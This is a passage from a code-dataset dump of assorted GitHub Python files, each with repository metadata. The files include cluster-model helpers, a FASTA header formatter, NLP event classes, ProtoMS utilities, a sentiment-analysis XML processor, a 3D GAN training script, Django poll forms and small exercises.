config_parser.has_option(\"cluster {0}\".format(cluster_label), \"queue_settings\")\n else ClusterModel.SIT\n )\n\n\ndef _infer_cluster_model_from_cfn(cfn_stack):\n \"\"\"\n Infer the cluster model from cfn params.\n\n Only HIT model is allowed to be stored if scheduler is Slurm, so checking the scheduler is enough to determine the\n cluster model.\n \"\"\"\n return ClusterModel.HIT if is_hit_enabled_cluster(cfn_stack) else ClusterModel.SIT\n\n\ndef get_cluster_model(name):\n \"\"\"Get the cluster model by name.\"\"\"\n # Simple binary check; no additional cluster models are expected in the next future.\n return ClusterModel.HIT if ClusterModel.HIT.name == name else ClusterModel.SIT\n\n\ndef load_cluster_models():\n \"\"\"Load supported cluster models.\"\"\"\n from pcluster.models.hit.hit_cluster_model import HITClusterModel\n from pcluster.models.sit.sit_cluster_model import SITClusterModel\n\n ClusterModel.HIT = HITClusterModel()\n ClusterModel.SIT = SITClusterModel()\n\n\nload_cluster_models()\n","repo_name":"rsips/cc_net","sub_path":"venv/lib/python3.7/site-packages/pcluster/cluster_model.py","file_name":"cluster_model.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28312817936","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport logging\nimport argparse\n\nLOG = logging.getLogger(__name__)\n\n__version__ = \"1.0.1\"\n__author__ = (\"Xingguo Zhang\",)\n__email__ = \"invicoun@foxmail.com\"\n__all__ = []\n\n\ndef format_argannot(seqid):\n\n seqid = seqid.split()[0]\n db, gene, gbid = seqid.split(\"~~~\", 2)\n gene = gene.split(\")\")\n seqid = \">%s%s) %s\" % (gene[0], gene[1], gbid)\n\n return seqid\n\n\ndef format_card(seqid):\n\n seqid = seqid.split(\"~~~\")\n seqid = \">%s\" % \" \".join(seqid[1::])\n\n return seqid\n\n\ndef format_megares(seqid):\n\n seqid= seqid.split(\"~~~\")\n seqid = \">%s(%s) %s\" % (seqid[2], seqid[1], seqid[3])\n\n return seqid\n\n\ndef format_ncbi(seqid):\n\n seqid= seqid.split(\"~~~\")\n seqid = \">%s\" % \" \".join(seqid[1::])\n\n return seqid\n\n\ndef format_plasmidfinder(seqid):\n\n seqid= seqid.split(\"~~~\")\n seqid = \">%s %s\" % (seqid[1], seqid[2])\n\n return seqid\n\n\ndef abricate_seq2format(file):\n\n for line in open(file):\n line = line.strip()\n\n if not line:\n continue\n if line.startswith(\">argannot\"):\n print(format_argannot(line))\n elif line.startswith(\">card~~~\"):\n print(format_card(line))\n elif line.startswith(\">megares~~~\"):\n print(format_megares(line))\n elif line.startswith(\">ncbi~~~\"):\n print(format_ncbi(line))\n elif line.startswith(\">plasmidfinder~~~\"):\n print(format_plasmidfinder(line))\n else:\n print(line)\n\n return 0\n\n\ndef add_hlep_args(parser):\n\n parser.add_argument(\"input\", metavar=\"FILE\", type=str,\n help=\"Input the fasta,(fasta)\")\n\n return parser\n\n\ndef main():\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.INFO,\n format=\"[%(levelname)s] %(message)s\"\n )\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\nFor exmple:\n abricate_seq2format.py OXA.fasta > OXA_new.fasta\n\nversion: %s\ncontact: %s <%s>\\\n ''' % (__version__, \" \".join(__author__), __email__))\n\n args = add_hlep_args(parser).parse_args()\n\n abricate_seq2format(args.input)\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"zxgsy520/superbug","sub_path":"abricate_seq2format.py","file_name":"abricate_seq2format.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29012392710","text":"from __future__ import annotations\nfrom typing import List\n\nfrom app.classes.events.custom_event.noun_phrase import NounPhrase, NPTextType\nfrom app.classes.events.custom_event.verb import Verb, VerbType\nfrom app.classes.events.custom_event.predicate import Predicate\nfrom app.classes.events.custom_event.adverb import Adverb\nfrom app.classes.events.custom_event.prep_phrase import PrepPhrase\nfrom app.classes.helpers.list_eq import ClassHelpers\n\nclass CustomEvent:\n def __init__(\n self, \n subj: NounPhrase = None, \n verb: Verb = None, \n adverb: Adverb = None, \n dobj: NounPhrase = None, \n predicate: Predicate = None, \n pps:List[PrepPhrase] = None,\n is_new: bool = True\n ):\n self.subj = subj\n self.verb = verb\n self.adverb = adverb\n self.dobj = dobj\n self.predicate = predicate\n self.pps = pps\n self.is_new = is_new\n\n\n def event_key(self):\n a = self._split_name()\n c = [x.lower() for x in a.split(' ')]\n d = '_'.join(c)\n e = f'evt_{d}'\n return e\n\n def get_declaration_name(self):\n a = self._split_name()\n c = [x.title() for x in a.split(' ')]\n return ''.join(c)\n \n\n def _split_name(self) -> str:\n # ROLE, VERB, OBJ\n a = []\n\n # ROLE\n if self.verb.verb_type in [VerbType.LINKING, VerbType.INTRANSITIVE]:\n if self.subj.is_role:\n a.append('agent')\n else:\n a.append(self.subj.to_text(NPTextType.BASIC))\n\n # VERB\n if self.verb.verb_type in [VerbType.TRANSITIVE, VerbType.INTRANSITIVE]:\n a.append(self.verb.lemma)\n \n # OBJ\n if self.verb.verb_type == VerbType.TRANSITIVE:\n if self.dobj.is_parm:\n split_parm = self.dobj.str_val[1:-1].replace('_', ' ').lower()\n a.append(split_parm)\n elif self.dobj.asset_type != 'Money':\n a.append(self.dobj.head)\n\n elif self.verb.verb_type == VerbType.LINKING:\n a.append(self.predicate.pred_str)\n \n if self.adverb:\n a.append(self.adverb.adverb_str)\n \n return ' '.join(a)\n\n\n def __eq__(self, other: CustomEvent) -> bool:\n return self.subj == other.subj and \\\n self.dobj == other.dobj and \\\n self.verb == other.verb and \\\n self.adverb == other.adverb and \\\n self.predicate == other.predicate and \\\n self.is_new == other.is_new and \\\n ClassHelpers.lists_eq(self.pps, other.pps, 'pp_str')\n\n\n","repo_name":"reganmeloche/symboleo-nlp","sub_path":"app/classes/events/custom_event/custom_event.py","file_name":"custom_event.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31951979061","text":"import logging\nimport numpy as np\nimport os\nimport subprocess\n\nlogger = logging.getLogger('protoms')\n\n\ndef _is_float(num):\n \"\"\"\n Check whether a string is convertible to a float\n\n Parameters\n ----------\n num : string\n the string which might be convertible to float\n\n Returns\n -------\n boolean\n whether the string is convertible to float\n \"\"\"\n try:\n float(num)\n except (ValueError, TypeError):\n return False\n return True\n\n\ndef _get_prefix(filename):\n \"\"\"\n Remove extension (including period from a filename)\n\n Parameters\n ----------\n filename : string\n the filename to modify\n\n Returns\n -------\n string\n the filename without extension\n \"\"\"\n h, t = os.path.splitext(filename)\n return h\n\n\ndef _locate_file(filename, folders):\n \"\"\"\n Find a file\n\n Tries to find the file as it is given or in\n any of the folders given\n\n Parameters\n ----------\n filename : string\n the name of the file to find\n folders : list of strings\n folders to search for the file\n\n Returns\n -------\n string or None\n the full filename or None if the file could not be found\n \"\"\"\n # Try to see if the filename as given exists\n if os.path.isfile(filename):\n return filename\n else:\n # Remove everything but the actual filename\n h, t = os.path.split(filename)\n # Loop over all folder and try to find it there\n for f in folders:\n test = os.path.join(f, t)\n if os.path.isfile(test):\n return test\n # If we haven't found it up to now, give up and return None\n return None\n\n\ndef rotmat_x(alpha):\n \"\"\"\n 3D rotation matrix for rotations about x-axis.\n\n Parameters\n ----------\n alpha : float or integer\n the angle (in radians) by which rotation is performed about the x-axis.\n\n Returns\n -------\n numpy array\n the rotation matrix for the desired angle.\n \"\"\"\n return (np.mat([[1.0, 0.0, 0.0], [0.0, np.cos(alpha), -np.sin(alpha)],\n [0.0, np.sin(alpha), np.cos(alpha)]]))\n\n\ndef rotmat_y(beta):\n \"\"\"\n 3D rotation matrix for rotations about x-axis.\n\n Parameters\n ----------\n beta : float or integer\n the angle (in radians) by which rotation is performed about the y-axis.\n\n Returns\n -------\n numpy array\n the rotation matrix for the desired angle.\n \"\"\"\n return (np.mat([[np.cos(beta), 0.0, np.sin(beta)], [0.0, 1.0, 0.0],\n [-np.sin(beta), 0.0, np.cos(beta)]]))\n\n\ndef rotmat_z(gamma):\n \"\"\"\n 3D rotation matrix for rotations about x-axis.\n\n Parameters\n ----------\n gamma : float or integer\n the angle (in radians) by which rotation is performed about the z-axis.\n\n Returns\n -------\n numpy array\n the rotation matrix for the desired angle.\n \"\"\"\n return (np.mat([[np.cos(gamma), -np.sin(gamma), 0.0],\n [np.sin(gamma), np.cos(gamma), 0.0], [0.0, 0.0, 1.0]]))\n\n\ndef _cleanup(tarlist):\n \"\"\"\n Clean up extra files\n\n Parameters\n ----------\n tarlist : list of string\n the files to be cleaned up\n \"\"\"\n tarlist2 = []\n for filename in tarlist:\n if filename in tarlist2:\n continue\n if filename.find(os.environ[\"PROTOMSHOME\"]) == 0:\n continue\n tarlist2.append(filename)\n\n logger.info(\"\")\n logger.info(\"Cleaning up and saving extra files to prep_files.tar\")\n logger.debug(\"The files are: %s\" % \" \".join(tarlist2))\n subprocess.call(\n \"tar -cf prep_files.tar %s\" % \" \".join(tarlist2), shell=True)\n subprocess.call(\"rm -f %s\" % \" \".join(tarlist2), shell=True)\n","repo_name":"essex-lab/ProtoMS","sub_path":"python/protomslib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"43635961874","text":"import unicodedata\nimport xml.etree.ElementTree as ET\nimport xml.dom.minidom\nfrom Logic.Analizador import Analizador\nfrom datetime import datetime\nimport re\n\nclass ProcesarArchivo:\n def __init__(self, xml_file_path):\n self.xml_file_path = xml_file_path\n\n def normalizar_texto(self, texto):\n # Convierte el texto a minúsculas\n texto = texto.lower()\n\n # Normaliza el texto para eliminar tildes y acentos\n texto_normalizado = ''.join(unicodedata.normalize('NFKD', c) for c in texto)\n\n # Elimina los caracteres que no son letras\n texto_normalizado = ''.join(c for c in texto_normalizado if not unicodedata.combining(c))\n\n return texto_normalizado\n\n def procesar_xml(self, mensaje_xml):\n try:\n treeXML = ET.parse(self.xml_file_path)\n rootXML = treeXML.getroot()\n root = mensaje_xml\n \n if len(rootXML) == 0:\n # Si no existe, crea un nuevo elemento MENSAJES\n print(\"No existen\")\n root = ET.Element('MENSAJES')\n else:\n for mensaje in root:\n # Normaliza el contenido del mensaje (convertir a minúsculas y quitar tildes)\n texto_fecha = mensaje.find('FECHA').text\n texto_mensaje = mensaje.find('TEXTO').text\n analizador = Analizador(texto_fecha, texto_mensaje)\n analizador.analizar_texto()\n analizador.generarArchivo()\n print(texto_mensaje)\n texto_normalizado = self.normalizar_texto(texto_mensaje)\n \n print(\"Texto normalizado\")\n print(texto_normalizado)\n mensaje.find('TEXTO').text = texto_normalizado\n rootXML.append(mensaje)\n \n\n # Agrega el mensaje XML al elemento MENSAJES\n \n\n # Guarda el árbol XML actualizado en el archivo\n tree = ET.ElementTree(rootXML)\n tree.write(self.xml_file_path)\n\n return 'Archivo XML procesado correctamente'\n except Exception as e:\n return 'Error al procesar el archivo XML: ' + str(e)\n\n def grabar_configuracion(self, configuracion_xml):\n try:\n treeDiccionario = ET.parse(self.xml_file_path)\n rootDiccionario = treeDiccionario.getroot()\n root = configuracion_xml\n\n palabras_positivas = [palabra.text for palabra in rootDiccionario.find('sentimientos_positivos')]\n palabras_negativas = [palabra.text for palabra in rootDiccionario.find('sentimientos_negativos')]\n palabras_negativas_rechasadas = [palabra.text for palabra in rootDiccionario.find('sentimientos_negativos_rechazados')]\n palabras_positivas_rechasadas = [palabra.text for palabra in rootDiccionario.find('sentimientos_positivo_rechazados')]\n contador_palabras_positivas=0\n contador_palabras_negativas=0\n for sentimientos in root:\n tipo_sentimientos = sentimientos.tag\n for palabra_element in sentimientos.findall('palabra'):\n palabra = palabra_element.text\n # Normaliza el texto\n palabra = self.normalizar_texto(palabra)\n\n # Verifica si la palabra ya existe en el diccionario antes de agregarla\n if palabra not in [palabra.text for palabra in rootDiccionario.find(tipo_sentimientos)]:\n nueva_palabra = ET.Element('palabra')\n nueva_palabra.text = palabra\n \n\n # Verifica si la palabra positiva existe en las negativas y viceversa\n if tipo_sentimientos == 'sentimientos_positivos' and palabra in palabras_negativas:\n print(\"Sentimiento positivo en negativo\")\n sentimientos_rechazados = rootDiccionario.find('sentimientos_positivo_rechazados')\n nueva_palabra_rechazada = ET.Element('palabra')\n nueva_palabra_rechazada.text = palabra\n sentimientos_rechazados.append(nueva_palabra_rechazada)\n \n elif tipo_sentimientos == 'sentimientos_negativos' and palabra in palabras_positivas:\n print(\"Sentimiento negativo en positivo\")\n sentimientos_rechazados = rootDiccionario.find('sentimientos_negativos_rechazados')\n nueva_palabra_rechazada = ET.Element('palabra')\n nueva_palabra_rechazada.text = palabra\n sentimientos_rechazados.append(nueva_palabra_rechazada)\n else:\n rootDiccionario.find(tipo_sentimientos).append(nueva_palabra)\n if tipo_sentimientos == 'sentimientos_positivos':\n contador_palabras_positivas+=1\n elif tipo_sentimientos == 'sentimientos_negativos':\n contador_palabras_negativas+=1\n \n # Guarda el árbol XML del diccionario actualizado en el archivo\n treeDiccionario = ET.ElementTree(rootDiccionario)\n treeDiccionario.write(self.xml_file_path)\n \n # Contar las palabras en cada categoría\n num_palabras_positivas_rechazadas = len(palabras_positivas_rechasadas)\n num_palabras_negativas_rechazadas = len(palabras_negativas_rechasadas)\n\n # Crear un nuevo árbol XML para el resumen\n resumen_configuracion = ET.Element('CONFIG_RECIBIDA')\n ET.SubElement(resumen_configuracion, 'PALABRAS_POSITIVAS').text = str(contador_palabras_positivas)\n ET.SubElement(resumen_configuracion, 'PALABRAS_POSITIVAS_RECHAZADA').text = str(num_palabras_positivas_rechazadas)\n ET.SubElement(resumen_configuracion, 'PALABRAS_NEGATIVAS').text = str(contador_palabras_negativas)\n ET.SubElement(resumen_configuracion, 'PALABRAS_NEGATIVAS_RECHAZADA').text = str(num_palabras_negativas_rechazadas)\n\n # Crear el árbol XML y escribirlo en el archivo \"resumenConfig.xml\"\n resumen_tree = ET.ElementTree(resumen_configuracion)\n \n xml_string = ET.tostring(resumen_configuracion, encoding='utf-8').decode()\n xml_string = xml.dom.minidom.parseString(xml_string).toprettyxml()\n with open('DB/resumenConfigTemp.xml', 'w') as xml_file:\n xml_file.write(xml_string)\n\n num_palabras_positivas = len(palabras_positivas)\n num_palabras_negativas = len(palabras_negativas)\n resumen_configuracionTodo = ET.Element('CONFIG_RECIBIDA')\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_POSITIVAS').text = str(num_palabras_positivas)\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_POSITIVAS_RECHAZADA').text = str(num_palabras_positivas_rechazadas)\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_NEGATIVAS').text = str(num_palabras_negativas)\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_NEGATIVAS_RECHAZADA').text = str(num_palabras_negativas_rechazadas)\n \n with open('DB/resumenConfig.xml', 'w') as xml_file:\n xml_file.write(xml_string)\n\n return 'Archivo XML procesado correctamente'\n except Exception as e:\n return 'Error al procesar el archivo XML: ' + str(e)\n\n def consultarSentimientos(self, fechaInicial, fechaFinal):\n with open(\"DB/mensajes.xml\", \"r\") as xml_file:\n xml_content = xml_file.read()\n resultadoMensaje=\"\"\n for mensaje in xml_content:\n fecha = mensaje.find('FECHA').text\n fecha_str= re.search(r'\\d{2}/\\d{2}/\\d{4}', self.fecha)\n fechaResultado=\"\"\n\n if fecha_str:\n fecha_str = fecha_str.group()\n formato = \"%d/%m/%Y\"\n\n try:\n fechfechaResultado = datetime.strptime(fecha_str, formato).date()\n fechaResultado = fecha.strftime(\"%d/%m/%Y\")\n except ValueError:\n fechaResultado = None\n else:\n fechaResultado = None\n\n if fechaResultado >= fechaInicial and fechaResultado <= fechaFinal:\n texto = mensaje.find('TEXTO').text\n analizador = Analizador(fecha, texto)\n resultado = analizador.analizarSentimientos(texto)\n resultadoMensaje+= \"Fecha: \"+ fechaResultado + \"\\n\" + resultado\n return resultadoMensaje\n\n def consultarHashtags(self, fechaInicial, fechaFinal):\n resultadoMensaje = \"\"\n \n try:\n tree = ET.parse(\"DB/mensajes.xml\")\n root = tree.getroot()\n\n for mensaje in root.iter('MENSAJE'):\n fecha_str = mensaje.find('FECHA').text\n fechaResultado = \"\"\n \n fecha_match = re.search(r'\\d{2}/\\d{2}/\\d{4}', fecha_str)\n \n if fecha_match:\n fecha_str = fecha_match.group()\n formato = \"%d/%m/%Y\"\n \n try:\n fechaResultado = datetime.strptime(fecha_str, formato).date()\n fechaResultado = fechaResultado.strftime(\"%d/%m/%Y\")\n except ValueError:\n fechaResultado = None\n print(\"Fecha inicial \"+ fechaInicial)\n print(\"Fecha final \"+ fechaFinal)\n print(\"R\"+fechaResultado)\n\n if fechaInicial <= fechaResultado <= fechaFinal:\n texto = mensaje.find('TEXTO').text\n print(\"Entroo\")\n print(texto)\n analizador = Analizador(fecha_str, texto)\n resultado = analizador.analizarHashtags(texto)\n resultadoMensaje += \"Fecha: \" + fechaResultado + \"\\n\" + resultado\n except Exception as e:\n resultadoMensaje = \"Error al procesar el archivo XML: \" + str(e)\n \n return resultadoMensaje\n \n def consultarMenciones(self, fechaInicial, fechaFinal):\n resultadoMensaje = \"\"\n \n try:\n tree = ET.parse(\"DB/mensajes.xml\")\n root = tree.getroot()\n\n for mensaje in root.iter('MENSAJE'):\n fecha_str = mensaje.find('FECHA').text\n fechaResultado = \"\"\n \n fecha_match = re.search(r'\\d{2}/\\d{2}/\\d{4}', fecha_str)\n \n if fecha_match:\n fecha_str = fecha_match.group()\n formato = \"%d/%m/%Y\"\n \n try:\n fechaResultado = datetime.strptime(fecha_str, formato).date()\n fechaResultado = fechaResultado.strftime(\"%d/%m/%Y\")\n except ValueError:\n fechaResultado = None\n print(\"Fecha inicial \"+ fechaInicial)\n print(\"Fecha final \"+ fechaFinal)\n print(\"R\"+fechaResultado)\n\n if fechaInicial <= fechaResultado <= fechaFinal:\n texto = mensaje.find('TEXTO').text\n print(\"Entroo\")\n print(texto)\n analizador = Analizador(fecha_str, texto)\n resultado = analizador.analizarMenciones(texto)\n resultadoMensaje += \"Fecha: \" + fechaResultado + \"\\n\" + resultado\n except Exception as e:\n resultadoMensaje = \"Error al procesar el archivo XML: \" + str(e)\n \n return resultadoMensaje\n \n","repo_name":"Carbonell-Castillo/Proyecto-de-Analisis-de-Sentimientos-en-Twitter","sub_path":"Logic/ProcesarArchivo.py","file_name":"ProcesarArchivo.py","file_ext":"py","file_size_in_byte":11993,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12801834011","text":"#\n# @lc app=leetcode id=989 lang=python3\n#\n# [989] Add to Array-Form of Integer\n#\n\n# @lc code=start\nclass Solution:\n def addToArrayForm(self, num: List[int], k: int) -> List[int]:\n # chuyển mảng về dạng số nguyên \n\n numsk = int(''.join(map(str,num)))\n # tổng các số \n sumk=numsk+k\n #chuyển về dạng mảng \n nums=[int(x) for x in str(sumk)]\n return nums\n \n \n# @lc code=end\n\n","repo_name":"cuuchuoiii/leetcode_LeDucChung","sub_path":"bai_989.py","file_name":"bai_989.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6934774716","text":"'''Description - Create a small command-line program in Python to calculate the total invoice amount for the below purchases - \nBook - Introduction to Python Programming : Rs 499.00\nBook - Python Libraries Cookbook : Rs. 855.00\nBook - Data Science in Python : Rs. 645.00\nTaxes and additional charges are described as details - \nGST : 12%\nDelivery Charges : Rs. 250.00\n'''\n\nBook1_price=499.00\nBook2_price=855.00\nBook3_price=645.00\nGst=12\nDelivery_charges=250.00\n\nBook_1=print(\"Book - Introduction to python programming : \",Book1_price)\nBook_2=print(\"Book - Python Libraries Cookbook : \",Book2_price)\nBook_3=print(\"Book - Data Science in Python : \",Book3_price)\n\nquantity1=int(input(\"Number of 'Introduction to python programming'Books : \"))\nquantity2=int(input(\"Number of 'Python Libraries Cookbook' Books : \"))\nquantity3=int(input(\"Number of 'Data Science in Python' Books : \"))\n\nTotal_sum=Book1_price*quantity1+Book2_price*quantity2+Book3_price*quantity3\nGst_sum=(Total_sum*Gst)/100\nFinal_sum=Total_sum+Gst_sum+Delivery_charges\n\nprint(\"Your Total Bill is : \",Final_sum)\nprint(\"Thanks for Purchasing! Have a great day!\")\n\n\n'''Description: Write a program in Python to print the number of unique letters in a string. Only new letters from the string should be counted and not duplicates.\nInput : string1 = \"India\"\nOutput : uniqueLetters = i,n,d,a\nInput : string1 = \"Dedication\"\nOutput : uniqueLetters = d,e,i,c,a,t,o,n\n'''\n\nString=input(\"String1 = \")\nString_lowercase= String.lower()\nRemove_whitespaces= String_lowercase.replace(\" \",\"\")\nString_set = set(Remove_whitespaces)\nprint(\"UniqueLetters = \")\nfor i in String_set:\n print(i)\nprint(\"Number of Unique Letters in the string:\",len(String_set))\n \n\n\n\n\n","repo_name":"Tara2610/Herovired-Assignments","sub_path":"Assignment_01.py","file_name":"Assignment_01.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11218572812","text":"from models import Generator, Discriminator\nfrom keras.optimizers import Adam\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom dataloader import DataLoader\nimport os\nimport numpy as np\n\ndef train(args):\n # optimizers\n dis_optim = Adam(lr=args.discriminator_lr, beta_1=args.beta)\n gen_optim = Adam(lr=args.generator_lr, beta_1=args.beta)\n\n # discrminator\n discriminator = Discriminator(args).build_discriminator()\n print('Discriminator...')\n discriminator.summary()\n discriminator.compile(loss='binary_crossentropy', optimizer=dis_optim)\n\n # generator\n generator = Generator(args).build_generator()\n print('Generator')\n generator.summary()\n z = Input(shape=(1, 1, 1, args.latent_dim))\n img = generator(z)\n\n # make discriminator not trainable\n discriminator.trainable = False\n validity = discriminator(img)\n\n combined = Model(input=z, output=validity)\n combined.compile(loss='binary_crossentropy', optimizer=gen_optim)\n\n # load data\n data_loader = DataLoader(args)\n X_train = np.array(data_loader.load_data()).astype(np.float32)\n dl, gl = [],[]\n for epoch in range(args.num_epochs):\n #sample a random batch\n idx = np.random.randint(len(X_train), size=args.batch_size)\n # print('Sampling indices...' + str(idx))\n real = X_train[idx]\n\n z = np.random.normal(0, 0.33, size=[args.batch_size, 1, 1, 1, args.latent_dim]).astype(np.float32)\n fake = generator.predict(z)\n\n real = np.expand_dims(real, axis=4)\n # eval_ = np.concatenate((real, fake))\n\n lab_real = np.reshape([1] * args.batch_size, (-1, 1, 1, 1, 1))\n lab_fake = np.reshape([0] * args.batch_size, (-1, 1, 1, 1, 1))\n # print(lab_real.shape)\n\n\n # calculate discrminator loss\n d_loss_real = discriminator.train_on_batch(real, lab_real)\n d_loss_fake = discriminator.train_on_batch(fake, lab_fake)\n\n d_loss = 0.5*np.add(d_loss_real, d_loss_fake)\n\n z = np.random.normal(0, 0.33, size=[args.batch_size, 1, 1, 1, args.latent_dim]).astype(np.float32)\n\n # calculate generator loss\n g_loss = combined.train_on_batch(z, np.reshape([1] * args.batch_size, (-1, 1, 1, 1, 1))).astype(np.float64)\n\n dl.append(d_loss)\n gl.append(g_loss)\n avg_d_loss = round(sum(dl)/len(dl), 4)\n avg_g_loss = round(sum(gl)/len(gl), 4)\n\n print('Training epoch {}/{}, d_loss_real/avg: {}/{}, g_loss/avg: {}/{}'.format(epoch+1, args.num_epochs, round(d_loss, 4), avg_d_loss, round(g_loss, 4), avg_g_loss))\n\n # sampling\n if epoch % args.sample_epoch == 0:\n if not os.path.exists(args.sample_path):\n os.makedirs(args.sample_path)\n print('Sampling...')\n sample_noise = np.random.normal(0, 0.33, size=[args.batch_size, 1, 1, 1, args.latent_dim]).astype(np.float32)\n generated_volumes = generator.predict(sample_noise, verbose=1)\n generated_volumes.dump(args.sample_path + '/sample_epoch_' + str(epoch+1) + '.npy')\n\n # save weights\n if epoch % args.save_epoch == 0:\n if not os.path.exists(args.checkpoints_path):\n os.makedirs(args.checkpoints_path)\n generator.save_weights(args.checkpoints_path + '/generator_epoch_' + str(epoch+1), True)\n discriminator.save_weights(args.checkpoints_path + '/discriminator_epoch_' + str(epoch+1), True)\n\n\n\n\n\n","repo_name":"enochkan/3dgan-keras","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"32213530443","text":"import os\nimport sys\n\n\ndef prismInit(prismArgs=[]):\n if \"PRISM_ROOT\" in os.environ:\n prismRoot = os.environ[\"PRISM_ROOT\"]\n if not prismRoot:\n return\n else:\n prismRoot = PRISMROOT\n\n\n sys.path.insert(0,\"C:/ProgramData/Prism2/plugins/Cinema/Integration/python3.7libs/PySide\")\n from PySide2 import QtWidgets\n qapp = QtWidgets.QApplication.instance()\n \n \n if not qapp:\n QtWidgets.QApplication(sys.argv)\n\n scriptDir = os.path.join(prismRoot, \"Scripts\")\n\n if scriptDir not in sys.path:\n sys.path.append(scriptDir)\n\n import PrismCore\n\n global pcore\n pcore = PrismCore.PrismCore(app=\"Cinema\", prismArgs=prismArgs)\n return pcore\n\n\n\n \n\n","repo_name":"kapellan2000/Cinema","sub_path":"Integration/python3.7libs/PrismInit.py","file_name":"PrismInit.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"71206365479","text":"# 하라는대로 하는 시뮬레이션 문제.\ndirection = {\n 'U' : (-1,0,'^'),\n 'D' : (1,0,'v'),\n 'L' : (0,-1,'<'),\n 'R' : (0,1,'>'),\n '^' : 'U',\n 'v' : 'D',\n '<' : 'L',\n '>' : 'R'\n}\ndef solution(H, W):\n x, y = finder(H,W)\n for a in act:\n if a == 'S':\n shooting(x,y,direction[direction[maps[x][y]]])\n else:\n maps[x][y] = direction[a][2]\n nx, ny = x+direction[a][0], y+direction[a][1]\n if 0<=nx', '^', 'v'):\n # 거기가 전차가 최초로 놓인 위치\n return (i,j)\n\ndef shooting(x,y,d):\n while True:\n x += d[0]\n y += d[1]\n if 0>x or x>=H or 0>y or y>=W:\n return\n elif maps[x][y] == '#':\n return \n elif maps[x][y] == '*':\n maps[x][y] = '.'\n return\n\n\ndef pprint(tc, H,W):\n print('#{}'.format(tc), end=' ')\n for i in range(H):\n print(*maps[i])\n\nfor tc in range(1, int(input())+1):\n H, W = map(int, input().split())\n maps = [list(input()) for _ in range(H)]\n N = int(input())\n act = list(input())\n solution(H, W)\n pprint(tc, H,W)","repo_name":"kyeah01/Problem_Solving","sub_path":"code/SWEA/1873_상호의배틀필드.py","file_name":"1873_상호의배틀필드.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32534649194","text":"from uniklinik.forms import BootstrapModelFormMixin\nfrom poll.models import Poll, Option\nfrom django import forms\nfrom django.db.transaction import atomic\nfrom uniklinik.utils import send_push_notifications\nfrom django.contrib.auth.models import User\nfrom account.models import Profile\nfrom django.db.models import F\n\n\nclass PollForm(BootstrapModelFormMixin):\n class Meta:\n model = Poll\n fields = (\"title\", \"description\",)\n\n\nclass PollUpdateForm(BootstrapModelFormMixin):\n option = forms.CharField(required=False, label=\"Neue Option\")\n\n class Meta:\n model = Poll\n fields = (\"title\", \"description\", \"open\", \"option\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.fields[\"title\"].required = True\n self.fields[\"title\"].widget.attrs[\"required\"] = \"required\"\n\n @atomic\n def save(self, commit=True):\n option_title = self.cleaned_data.get(\"option\")\n if option_title:\n new_option = Option(title=option_title)\n new_option.save()\n self.instance.option_set.add(new_option)\n\n option_open = self.cleaned_data.get(\"open\")\n\n if option_open is True:\n poll_title = self.cleaned_data.get(\"title\")\n\n def update_badge_method(push_user_ids):\n Profile.objects.filter(user_id__in=push_user_ids).update(poll_badges=F(\"poll_badges\") + 1)\n\n send_push_notifications(\n User.objects.all(), \"Es gibt eine neue Umfrage\", f\"{poll_title}\", \"poll\", update_badge_method)\n return super().save(commit)\n\n def clean_open(self):\n open_value = self.cleaned_data.get(\"open\")\n if open_value is True:\n if self.instance.option_set.count() == 0:\n option = self.data.get(\"option\")\n print(f\"bananana: {option}\")\n if not option:\n self.add_error(\n \"open\", \"Sie müssen der Umfrage erst eine Option zuweisen, um diese veröffentlichen zu können.\")\n return open_value\n\n\nclass OptionForm(BootstrapModelFormMixin):\n class Meta:\n model = Option\n fields = (\"title\",)\n","repo_name":"memobijou/clinic-app","sub_path":"poll/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26149737920","text":"from typing import Union, Sequence, Callable\n\nimport torch\nfrom torch.nn import Module, Sequential, BatchNorm2d, Conv2d, ReLU, ConstantPad3d, Identity, AdaptiveAvgPool2d, Linear\nfrom torch import Tensor\nfrom torch.nn.init import zeros_, kaiming_normal_\nfrom torch.nn.modules.flatten import Flatten\nimport torch.nn.functional as F\n\n\nclass IdentityShortcut(Module):\n def __init__(self, transform_function: Callable[[Tensor], Tensor]):\n super(IdentityShortcut, self).__init__()\n self.transform_function = transform_function\n\n def forward(self, x: Tensor) -> Tensor:\n return self.transform_function(x)\n\n\ndef 